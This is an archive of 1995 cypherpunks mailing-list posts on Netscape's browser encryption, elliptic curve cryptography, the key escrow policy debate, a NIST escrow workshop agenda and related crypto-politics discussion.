This is from the Sept 11, 1995 Inter@ctive Week:

Netscape Communications Corp.'s freely distributed browser is getting 
commercial-grade encryption, making it safe to use in the U.S.  The 
change comes two weeks after Inter@ctive Week disclosed that the free 
version contained reletively weak encryption that had been cracked by a 
European user.

[...]

Meanwhile, in an as yet unannouced move, the company said it would place 
its commercial browser online for free downloading.  THat move apparently 
comes in direct response to an Inter@ctive Week article that highlighted 
the fact that all shareware versions of the browser contain the so-called 
40-bit key encryption software which was recently proven insecure.  THe 
commercial version, sold only in the U.S. contains an unbreakable 128-bit 
encryption scheme.

Netscape said it received word last week that the State Department had 
cleared that version for release on the Net, but only within the U.S., 
owing to current export laws banning the export of encryption schemes 
stronger than 40 bits.  THe company could provide no details by press 
time on how it would ensure that the 128-bit version wouldn't leak beyond 
U.S. borders.

[end excerpts]

I love how Inter@ctive Week pats themselves on the back for making people 
aware of the problem. I guess the cypherpunk media hacking is working.  
Doing things behind the scenes and making the press think they are the 
internet users salvation looks like a good tactic.

The cypherpunks forced a situation where Net users now have better 
encryption available to them.  I'd say this is a big win.

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Tue, 12 Sep 95 09:48:44 PDT
To: talon57@well.com (Brian D Williams)
Subject: Re: Elliptic Curve Public Key Crypto
In-Reply-To: <199509121620.JAA08381@well.com>
Message-ID: <3055b9ac3c42002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


A little birdie told me that Brian D Williams said:
> 
>  Now could someone remind me where the Cypherpunks FTP site is?
> 

ftp://ftp.csua.berkeley.edu/pub/cypherpunks

-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 12 Sep 95 10:03:01 PDT
To: Mike Rosing <cryptech@Mars.mcs.com>
Subject: Re: Elliptic Curve Public Key Crypto available
Message-ID: <9509121658.AA00550@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Previous to the availabilty of 100 MHz processors this method of
>  public key crypto was ridculously slow.  The only versions were
>  laboratory curiosities implemented in ASIC hardware.  Code, if it
>  exists, is not in the public domain.

What about NeXT's Fast Elliptic Encryption (FEE)?  Their research guy,  
Richard Crandall, came up with major speedups to elliptic curve encryption.   
In fact, there was a simple cryptosystem that shipped as a demo with NeXTSTEP  
2.0.  What was most interesting about this system was that it didn't store  
any keys anywhere;  your public/private key pair was generated _on the fly_  
from your passphrase every time you encrypted or decrypted....on a 25mhz  
68040 too...   and it was fast!  It wasn't that great of an implementation  
(you _really_ need a lot of bits of entropy in that passphrase, and you can't  
change your passphrase without changing your PK), but it shows how fast  
NeXT's speedups are.  And this was in 1990...

I'm not sure if the speedups are patented, but you could try a literature  
search.  If it really is fast then it could mean good things for servers that  
need to do a lot of enrcyption/decrption for interaction with clients.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: keelings@wu1.wl.aecl.ca (S. Keeling)
Date: Tue, 12 Sep 95 13:17:31 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and
Message-ID: <9509121731.AA10786@wu1.wl.aecl.ca>
MIME-Version: 1.0
Content-Type: text/plain


Incoming from Henry W. Farkas:
> 
[snip]
> When the safety is finally removed from the gun at your head (sorry for
> the drama) you hand over your alternate secret key.  If decrypted with the
> "alternate" or "fake" secret key, the encrypted file is wiped until it
> reaches a marker; the remainder of the file is displayed.  If you use your
> "primary" or "real key", the extraneous text is simply stripped. 

	I would just like to point out that, when a LEA comes to you
to get at the contents of your computer, (s)he is not going to
patiently wait while your system wipes the offending evidence off your
hard disk.  The first thing they do is make a copy of everything, so
they can work from the copy.  Besides, you do have backup tapes laying
around all over the place, don't you?

-- 

 "Remember, obsolescence (Win95) isn't an accident;  it's an art form!" 
   keelings@wu1.wl.aecl.ca       s. keeling,   aecl - whiteshell labs



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 12 Sep 95 12:44:31 PDT
To: talon57@well.com (Brian D Williams)
Subject: Re: Elliptic Curve Public Key Crypto
In-Reply-To: <199509121620.JAA08381@well.com>
Message-ID: <199509121939.MAA25838@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	ftp.csua.berkeley.edu


> 
> 
> 
> Mike Rosing writes:
> 
> >in the cypherpunks ftp site /pub/cypherpunks/ciphers are 2 ascii
> >files. One contains code and the other contains documentation:
> >eliptic.src and elliptic.doc.  The code portion is a cat'ed block
> >of files: headers, C sources and a set of prime numbers.  The
> >documentation attempts to explain the math, but it does help if
> >you already know number theory.  It hopefully isn't necessary.
>  
>  Thanks Mike for all your effort!!
> 
>  Now could someone remind me where the Cypherpunks FTP site is?
> 
>  Please?
> 
> Brian D Williams
> Cypherpatriot
> 
>  " Zen? Well it beats sitting around on your ass all day doing
>    nothing! "
> 


-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Tue, 12 Sep 95 12:49:59 PDT
To: Weld Pond <weld@l0pht.com>
Subject: Re: Netscape to patch shareware version
In-Reply-To: <Pine.BSD/.3.91.950912111322.20533B-100000@l0pht.com>
Message-ID: <199509121948.MAA03663@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| Meanwhile, in an as yet unannouced move, the company said it would place 
| its commercial browser online for free downloading. [..] THe commercial
| version, sold only in the U.S. contains an unbreakable 128-bit
| encryption scheme. 

Hurray! We did it! We did it! :-)

| Netscape said it received word last week that the State Department had 
| cleared that version for release on the Net, but only within the U.S., 
| owing to current export laws banning the export of encryption schemes 
| stronger than 40 bits.  THe company could provide no details by press 
| time on how it would ensure that the 128-bit version wouldn't leak beyond 
| U.S. borders.

Ok, any bet on how long it will take?

| The cypherpunks forced a situation where Net users now have better 
| encryption available to them.  I'd say this is a big win.

The power of the Net is actually quite astonishing at times. The
plotting in Ender's Game isn't all that unrealistic after all. (Oh,
well, ruler of the world is a bit of still. ;-))

/Christian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Tue, 12 Sep 95 09:57:03 PDT
To: cypherpunks@toad.com
Subject: Famous Zen koan: what is the sound of two shoes dropping?
Message-ID: <9509121656.AA18132@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


You may recall that Dorothy Denning had a pro-Clipper article in
_Technology Review_ back in July.  The October issue of TR contains
not only some critical letters to the editor, but also a reply from
Denning.  How things have changed over the last 18 months...

					--bal

------- Start of forwarded message -------
Date: Tue, 12 Sep 95 12:23:00 -0400
Return-Path: <hal@martigny.ai.mit.edu>
From: Hal Abelson <hal@martigny.ai.mit.edu>
To: bal@martigny.ai.mit.edu
Subject: Famous Zen koan: what is the sound of two shoes dropping?

What is the sound of two shoes dropping?

**Part 1:  March 10, 1994

(From the debate between Dorothy Denning and John Perry Barlow,
moderated by Philip Elmer-DeWitt)

Barlow: EFF is not asking the Government to drop Clipper, though we
would vastly prefer they did. We're merely asking that no steps be
taken to require it either by law or practice...as, for example, would
be the case if you had to use a Clipper chip to file your tax return.

DeWitt: Dr. Denning, do you think this is the "first step in a
process to outlaw crypto"?

Denning: No I do not.

***Part 2: October 10, 1995

(From Dorothy Denning's response to letters to the editor in
_Technology Review_)

Denning:  But critics make an important point when they argue that
criminals will not use Clipper or other forms of key escrow
encryption.  As long as there are no laws in the United States
controlling the sale and distribution of encryption products, the
U.S. market will be flooded with products that have no provisions for
government access.  This eventual threat to public safety and social
order could be avoided by establishing a licensing program for
encryption products that reasonably satisfy the government's
decryption requirements and do not interoperate with unlicensed
systems.  While the manufacture and distribution of unlicensed
encryption products would be illegal, no particular system would be
mandatory and any licensed product could be used without restriction.
Although such a licensing program would not prevent criminals from
using unlicensed products, their availability would be limited to
underground channels.

------- End of forwarded message -------

P.S. Denning's TR article is available at:

http://web.mit.edu/afs/athena/org/t/techreview/www/articles/july95/Denning.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Tue, 12 Sep 95 13:01:10 PDT
To: dccp@eff.org
Subject: DC-C'punks meeting
Message-ID: <199509121958.MAA01005@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to waste list bandwidth for the 600 folks too far
away to care about this...

The next DC-area c'punks meeting will be September 16, it will be 
at the Digex headquarters offices in Beltsville, probably 
starting about 3:00 PM. 

Digital Express Group
6800 Virginia Manor Road
Beltsville Maryland 20705
(301) 847-5000 

Directions to DIGEX

From the Washington Beltway (I495) in Maryland, take Route 1 North.
drive on Route 1 a few miles, maybe as many as three or four.
You will see a Ritz Camera Center. Turn left onto Ritz Way.
At the second street, turn Right onto Virginia Manor Road.
You are now near 6800 Virginia Manor Road.
Digex is the last building on the Right. 

If you need more information, email me, or see my
http://www.isse.gmu.edu/~pfarrell/dccp page.

Pat

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A5113643667@attpls.net (Tom Jones)
Date: Tue, 12 Sep 95 06:06:14 PDT
To: peace@acm.org (Tom Jones)
Subject: No Subject
Message-ID: <D71D5F23>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks and Tom,

The ones I've heard about are SKIP, Photurus and ISAKMP(sp?).

Peace

---
 NOTICE: This message originally included graphics and/or sounds which
can only be received by AT&T PersonaLink(sm) subscribers. You received
only the text portion(s) of the message.  Please contact the sender for
information that was deleted. To learn how to send and receive
graphics, voice and text messages via AT&T PersonaLink Services, call
1-800-936-LINK.  

----------------
Received: by attpls.net with Magicmail;12 Sep 95 10:34:32 UT
Date: 12 Sep 95 13:05:43 UT
Sender: owner-cypherpunks@toad.com (owner-cypherpunks)
From: owner-cypherpunks@toad.com (owner-cypherpunks)
Subject: Re: draft key mgmt props
To: peace@acm.org (Tom Jones)
cc: cypherpunks@toad.com (Cypherpunks)
Message-Id: <199509121024.GAA15929@frankenstein.piermont.com>
In-Reply-To: <Your message of "Tue, 12 Sep 1995 07:15:16 -0000."
 <3E79EDD0>>
Reply-To: perry@piermont.com (perry)
X-X-AUTHENTICATION-WARNING: frankenstein.piermont.com: Host localhost
 didn't use HELO protocol
X-X-REPOSTING-POLICY: redistribute only with permission


Tom Jones writes:
> Does anyone here feel like explaining the situation between the three
> key management proposals now at the internet draft stage?

Which ones are you refering to?

.pm

----------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@coyote.csusm.edu>
Date: Tue, 12 Sep 95 13:50:40 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: Netscape to patch shareware version
Message-ID: <v03003201ac7ba018fb3e@[199.254.15.58]>
MIME-Version: 1.0
Content-Type: text/plain


>| Meanwhile, in an as yet unannouced move, the company said it would place
>| its commercial browser online for free downloading. [..] THe commercial
>| version, sold only in the U.S. contains an unbreakable 128-bit
>| encryption scheme.
>
>Hurray! We did it! We did it! :-)

Indeed. Congratulations to Damien, Adam, and all the other people who
contributed cycles to the "Cypherpunks Key Breaking Ring".

>
>| Netscape said it received word last week that the State Department had
>| cleared that version for release on the Net, but only within the U.S.,
>| owing to current export laws banning the export of encryption schemes
>| stronger than 40 bits.  THe company could provide no details by press
>| time on how it would ensure that the 128-bit version wouldn't leak beyond
>| U.S. borders.
>
    I suspect Netscape will do the minimum so that they will not be held liable.

>Ok, any bet on how long it will take?
>
    Less than 3 hours.

>| The cypherpunks forced a situation where Net users now have better
>| encryption available to them.  I'd say this is a big win.
>
>The power of the Net is actually quite astonishing at times. The
>plotting in Ender's Game isn't all that unrealistic after all. (Oh,
>well, ruler of the world is a bit of still. ;-))
>
Demosthenes






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 12 Sep 95 10:45:36 PDT
To: cypherpunks@toad.com
Subject: Re: Digital Fingerprinting
Message-ID: <9509121745.AA19687@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Finding the mail mixed in there is evidence that supports the "charge" 
> but surely can be rebutted.  When I was practicing in a small town c. 
> 1984, people would be summoned (sent a paper telling them to show up) to 
> court for illegal dumping if their mail was found with other trash, old 
> refrigerators, etc., in a creek somewhere.  Those charged could always 
> put on proof that Billy Bob's garbage service picked up their trash ...

> The sentence was almost always to go and pick up some multiple of the 
> garbage found and take it to the landfill.

This was Stockbridge, in MA, right :-?

	        That's what we did, and drove back to the church, had a
	thanksgiving dinner that couldn't be beat, went to sleep and didn't
	get up until the next morning, when we got a phone call from officer
	Obie.  Said "Kid, we found your name on an envelope at the bottom of a
	half a ton of garbage, and just wanted to know if you had any
	information bout it". I said "Yes Sir Officer Obie, I cannot tell a
	lie, I put that envelope under that garbage."
(c) Arlo Guthrie


 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 12 Sep 95 10:54:49 PDT
To: cypherpunks@toad.com
Subject: Payment Systems
Message-ID: <v02120d01ac7b76984c67@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: "John Hemming CEO MarketNet"  <JohnHemming@mkn.co.uk>
Date:  Tue, 12 Sep 1995 15:38:00 PM PDT
To: www-buyinfo@allegra.att.com
Mime-Version: 1.0
Subject: Payment Systems

For the edification of those concerned we have issued our first
Electronic Cheque today.

The browser now has been tested linking signed instructions
directly to the web.  The browser, however, is still being developed
to resolve the problems with shortage of space in Windoze DGROUP.

There is a copy of the browser at
ftp://193.119.26.70/mktnet/pub/echeque.zip  (or something
similar) we would recommend waiting a while before you take it
however and to take the horse.zip as well because of the DGROUP
issue).

The only form that will accept Echeques at the moment is
http://193.118.187.107/load ordflow

The trick in this form (if you are using our browser) is that it allows
payment either by ECheque or by credit card and only generates the
signed instruction for echeques.  The signed instruction is then
sent to our servers encrypted with 128 bit RC4.

ttfn
John

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kelso@netcom.com (Tom Rollins)
Date: Tue, 12 Sep 95 14:17:31 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and (fwd)
Message-ID: <199509122056.NAA19963@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 	I would just like to point out that, when a LEA comes to you
> to get at the contents of your computer, (s)he is not going to
> patiently wait while your system wipes the offending evidence off your
> hard disk.  The first thing they do is make a copy of everything, so
> they can work from the copy.  Besides, you do have backup tapes laying
> around all over the place, don't you?
 
Sounds like a recomendation for SFS (Secure File System).
It encryppts everything going to the disk.
I used an SFS partition for a while.  But, I swap between
DOS and Linux.  Havn't seen SFS for linux yet.
 
Later,
Tom <kelso@netcom.com>
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Philipp <adam@rosa.com>
Date: Tue, 12 Sep 95 14:00:54 PDT
To: John Young <cypherpunks@toad.com
Subject: VOO_doo
Message-ID: <m0sscWB-000HLCC@powergrid.electriciti.com>
MIME-Version: 1.0
Content-Type: text/plain



--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|    http://www.rosa.com/~adam    |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA: Confidential,          |communications are preferred for   | 
|secret, not for publication.     |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 12 Sep 95 14:07:02 PDT
To: cypherpunks@toad.com
Subject: Key Escrow as Law Enforcement's *Worst Nightmare*
Message-ID: <ac7b412911021004bdd2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



"Be careful what you ask for--you might get it." (Albanian Proverb)

I'll summarize my post with my last line: In short, key escrow could be law
enforcement's worst nightmare, as it truly opens up the Web as a worldwide,
distributed file system.

At 6:31 PM 9/12/95, S. Keeling wrote:

>        I would just like to point out that, when a LEA comes to you
>to get at the contents of your computer, (s)he is not going to
>patiently wait while your system wipes the offending evidence off your
>hard disk.  The first thing they do is make a copy of everything, so
>they can work from the copy.  Besides, you do have backup tapes laying
>around all over the place, don't you?

This is a main reason why "key escrow" is a double-edged sword for Law
Enforcement. That is, it is not an unadulterated "win" for them.

Consider the easy availability of a "key escrow" system (I'm deliberately
avoiding calling it either SKE, or CKE, or GAK) in which files may be
locally encrypted with the files, local decryption software, etc., stored
locally--but with efficient fast-erase methods (ranging from the
oft-mentioned "thermite charge" to a more user-friendly overvoltage to fry
the motherboard (for example, just to make the point).

(My point is not to speculate on what a "dead man switch" might look like,
but merely to look at the implications of widespread key escrow and data
destruction tools.)

Key escrow, with the keys deposited safely with one's "Family" (in both
senses of the term), and/or with one's lawyer, and/or in offshore
locations) could make the use of dead man switches much "safer." A numbers
game operator can rest easy in flushing his computer, knowing key escrow
and remote storage exists.

"Remote storage"? Sure, the Web offers easy and transparent ways to split
files up and store them in various locales. Kind of makes "search warrants"
a problem, doesn't it? The promise of the Web, to many of us, is that URLs
essentially make the machines accessible via the Web into a kind of huge,
distributed file system.

Remote sites can already be used for storage, obviously. The Web offers a
new degree of automation of the process, with many interesting
possibilities.

An interesting project would be build tools similar to ftp for automatic
backup of files to remote locations, perhaps locations that accept
"deposits" for a fee. (In digital money tokens, even.)

The tool could do multi-part splitting, and could encrypt the files. Keys
(and the locations of the parts) could independently exploit the kind of
"key escrow" mentioned above.

So, a raid is made on a site. The files are not found there, as they have
been automatically filed on other sites, with the key/location info
escrowed with escrow agents who are not cooperative with search warrants,
subpoenas, etc.

(It may be sufficient for a person to "remember" the N sites, as the sites
may be uncooperative enough so as to make it impossible for the law
enforcement people to "demand" access to files. I can discuss this furhter.
While not "secure" in a strong crypto sense, in practice this will be
pretty effective--after all, the pieces are similar to offshore bank
account access info, and law enforcement is pretty much powerless to get N
countries/banks to cooperate on a blanket search.)

In short, key escrow could be law enforcement's worst nightmare, as it
truly opens up the Web as a worldwide, distributed file system.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Tue, 12 Sep 95 11:19:50 PDT
To: cypherpunks@toad.com
Subject: NIST conference summary in CDT
Message-ID: <Pine.ULT.3.91.950912141544.12986A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain



The Center for Democracy in Technology policy posting no. 24 provides a
pretty good summary of the NIST conference.  If anyone is interested,
e-mail me privately and I can forward it to you. 

-=Kathleen M. Ellis=-

kelli@zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- y+>+(-)
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Tue, 12 Sep 95 14:53:28 PDT
To: cypherpunks@toad.com
Subject: Friday (15 Sep) GAK meeting at NIST
Message-ID: <199509122153.OAA02242@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



I was hoping to attend and enturbulate, but my schedule doesn't quite wrap
around it.  Here's the schedule and talking paper they sent when I inquired.

	Jim Gillogly
	Hevensday, 21 Halimath S.R. 1995, 21:48

----------------------------------------------------------------------------

                    WORKSHOP TENTATIVE AGENDA
             Developing Federal Key Escrow Standards

                       September 15, 1995
                          Hilton Hotel
                     Gaithersburg, Maryland
                                
9:00      Welcome, Agenda Overview
          Miles Smid, NIST

Goals and Objectives

9:10      Discussion of Goals and Objectives
          Ray Kammer, Deputy Director, NIST

9:20      Initial Thoughts on Standards Development
          Miles Smid, NIST

9:30      Industry Perspectives (5-10 min max.)

          Note:  We still have a few slots of 5 min. available. 
          Please let Arlene Carlton (301-975-3240) know if you
          would like to make a formal presentation.
          
10:30     Break

10:45     Discussion

Technical Considerations

11:00     Identifying Technical Issues
          Miles Smid, NIST

11:15     Discussion

12:00     Lunch

1:30      Breakout sessions

3:15      Break

3:30      Breakout session reports

4:15      Discussion

4:30      Future Activities (Miles Smid, NIST)

5:00      Close                                        

Note:  The workshop will be held September 15, 1995 (9:00 a.m. -
5:00 p.m.) at the Gaithersburg Hilton Hotel, 620 Perry Parkway,
Gaithersburg, Maryland.  The meeting will be open to the public,
although seating is limited.  Advance registration is requested,
please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784
or e-mail: carlton@micf.nist.gov.  (9/6/95)

                      ---------------------

Developing Federal Key Escrow Encryption Standards Workshop
September 15, 1995

                        Discussion Paper

In announcements made on August 17, 1995, the Government stated
its intention to work with industry and other interested
individuals to develop federal key escrow encryption standards,
including those implementable in software.  This standard, when
developed and approved, will be used by federal agencies (and
others, if they so choose) in conjunction with FIPS-approved
encryption techniques.  

The structure of the envisioned standard(s), its technical
specificity, goals and objectives, important technical
considerations, and issues of process must be addressed in order
to move forward.  Some of the more technical issues include:

-    Is a standard interface for the release of keys desirable?

-    What documentation is required?

-    How will operational procedures be developed?

-    How will conformance be validated?

-    Will security be evaluated?  If so, under what criteria and
     by whom?

-    How will configuration control be maintained?

-    Are new FIPS-approved algorithms necessary?

-    Should escrowing be built into the Public Key
     Infrastructure?

-    Is a standard escrow system identification field needed?

-    Is split knowledge required?

-    Do systems which permit data to be encrypted for both
     storage and transmission need to provide for both types of
     escrow?

-    Does the government require special features (e.g., two hour
     access, continuous real-time decryption, etc.)?

-    Who will draft the standard?  Timeframe?

Note:  These issues will be discussed at the Key Escrow Standards
Development Workshop to be held September 15, 1995 (9:00 a.m. -
5:00 p.m.) at the Gaithersburg Hilton Hotel, 620 Perry Parkway,
Gaithersburg, Maryland.  The meeting will be open to the public,
although seating is limited.  Advance registration is requested,
please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784
or e-mail: carlton@micf.nist.gov.                      

9/6/95

----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lindat@iquest.net (Linda Thompson, American Justice Federation)
Date: Tue, 12 Sep 95 14:07:34 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
Message-ID: <m0ssbX5-00062kC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain



>To: cypherpunks@toad.com
>From: an215712@anon.penet.fi
>X-Anonymously-To: cypherpunks@toad.com
>Organization: Anonymous forwarding service
>Reply-To: an215712@anon.penet.fi
>Date: Tue, 12 Sep 1995 17:17:15 UTC
>Subject: Whitehouse "dissident" web site monitoring?
>
>- ----------------------------------------------------------
>
>      WHITE HOUSE MONITORING OF DISSIDENTS ON THE INTERNET
>
>
>    The  National  Security   Agency   presumably   can   monitor
>subversive  communication  on  the  Internet  without leaving any
>trace  by  "sniffing  packets"  at  traffic  nodes.  For   purely
>political  purposes, however, the White House may be forced to do
>the monitoring in-house,  which  means  that  they  leave  traces
>everywhere they go.
>
>    With  just  a  superficial  search  for  such   traces,   The
>Washington   Weekly   has   uncovered   intensive  monitoring  of
>"dissident" Internet sites by the White House.
>
>    It turns out that computers from inside the White House  have
>kept  pretty  good  tabs  on information available on Whitewater,
>Vince Foster, and Mena at a few key repositories  on  the  World-
>Wide Web, a subset of the Internet.
>
>    Just  three  such  sites:  "The   Washington   Weekly,   "The
>Whitewater  Scandal  Home  Page" and "Whitewater & Vince Foster,"
>were accessed 128 times by  four  computers  from  the  Executive
>Office  of the President between August 28 and August 31.  If the
>White House is showing a similar interest in other sites  on  the
>World  Wide  Web,  that would amount to a monitoring operation of
>considerable magnitude. Tim Brady of the  Yahoo!  World-Wide  Web
>index  says  that his company alone has indexed approximately 725
>political  sites.  That  monitoring  effort  would  be   nothing,
>however,  compared  to  the  effort  required to follow all anti-
>Clinton discussion on the Usenet, another subset of the Internet.
>
>    The White House did  not  respond  to  an  inquiry  (attached
>below)   asking  for  an  explanation  and  asking  whether  this
>constituted "casual browsing."
>
>    Interestingly, the week after the  White  House  snooping  of
>files,  which included a series of articles by J. Orlin Grabbe on
>Vince Foster's ties  to  the  NSA,  the  following  little  piece
>appeared in Newsweek Magazine:
>
>  "Conspiracy theorists perked up when Deborah Gorham told Senate
>  Whitewater investigators in June that her boss, the late deputy
>  White House counsel Vince Foster, asked her  to  put two secret
>  notebooks  from  the  National Security Agency in a White House
>  safe. The suggestion that  Foster  dealt  with  the NSA sparked
>  feverish  speculation  on the  Internet that he was involved in
>  espionage. The reality appears more prosaic.  The  White  House
>  won't give details,  but  sources say Foster's files dealt with
>  legal questions about national emergencies...."
====================================================

During the Waco Hearings, Charles Schumer said he'd seen Foster's missing
file and all it had in it was a memorandum about "Linda Thompson and THAT tape."

Now, put that with the "sources say Foster's files dealt with legal
questions bout national emergencies . . . ." and I will presume that "THAT
tape" and I constitute a "national emergency."

Harumph.

At any rate, we've (AEN News) had a number of military-based sniffs here.

-- Linda

================================================

>    Does the White House follow anti-Clinton discussion on Usenet
>newsgroups just as closely?  The White House posts press releases
>to Usenet in collaboration with the Artificial  Intelligence  Lab
>at   Massachusetts   Institute  of  Technology.  But  MIT  System
>Administrator Bruce Walton says that the White House does not use
>the  same  server  for  reading netnews.  It would be difficult -
>although not impossible - to find the server that the White House
>uses  for  reading  or  receiving netnews and check for traces on
>that server.
>
>    Readers may be tempted to post a threat to the President on a
>newsgroup just to see if they get a visit from the Secret Service
>the next day. That experiment is not advisable. It is a  criminal
>offense.  But  Usenet  just might be a faster conduit for getting
>the attention of the administration than the email  address  that
>the White House has published for the president.
>
>Attachment:
>
>
>                      THE WASHINGTON WEEKLY
>_________________________________________________________________
>
>August 31, 1995
>
>Virginia M. Terzano
>White House Office of the Press Secretary
>The White House
>
>
>Dear Ms. Terzano:
>
>    It has come to my attention that several dissident  sites  on
>the  World  Wide  Web  have been visited by White House computers
>this week.  Apparently,  all  information  regarding  Whitewater,
>Foster, and Mena has been transferred to White House computers.
>
>    Specifically, the sites,  
>
>"Washington Weekly" (http://www.federal.com),  
>"The Whitewater Scandal Home Page"
>(http://www.cs.dartmouth.edu/~crow/whitewater/)
>"Whitewater & Vince Foster" 
>(http://www.cris.com/~dwheeler/n/whitewater/whitewater-index.html)
>
>have  been  visited  by  White  House   computers   ist1.eop.gov,
>ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August
>28 and August 31, and a total of 128 files have been  transferred
>to those White House computers. For all sites, this constitutes a
>significant  increase  over  previous  access  by   White   House
>computers.
>
>    In light of this information, I have the following questions:
>
>(1) Does this constitute "casual browsing" by White House staff, or
>    is it, in light of the considerable time and effort spent during 
>    regular business hours, part of a monitoring or intelligence operation?
>
>(2) For what purpose is the information transferred to the White House used?
>
>(3) Does the White House keep information from these web sites on file,
>    and does the White House keep a file on the persons responsible for
>    these web sites?
>
>(4) Is the April 9 statement by David Lytel of the White House Office of
>    Science and Technology to Amy Bauer of Copley News Service that the
>    administration does not monitor anti-Clinton activity on the web still
>    operative?
>
>
>    Thank you very much for your cooperation in this matter.
>
>Sincerely,
>
>Marvin Lee
>The Washington Weekly
>
>Copyright (c) 1995 The Washington Weekly (http://www.federal.com)
>
>
>
Linda Thompson
American Justice Federation
Home of AEN News and "Waco, the Big Lie" "America Under Siege"
3850 S. Emerson Ave.
Indianapolis, IN  46203
Telephone:  (317) 780-5200
Fax:  (317) 780-5209
Internet:  lindat@iquest.net

"When even one American -- who has done nothing wrong -- is forced by fear
to shut his mind and close his mouth, then all Americans are in peril."
Harry Truman






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Tue, 12 Sep 95 13:08:34 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape to patch shareware version
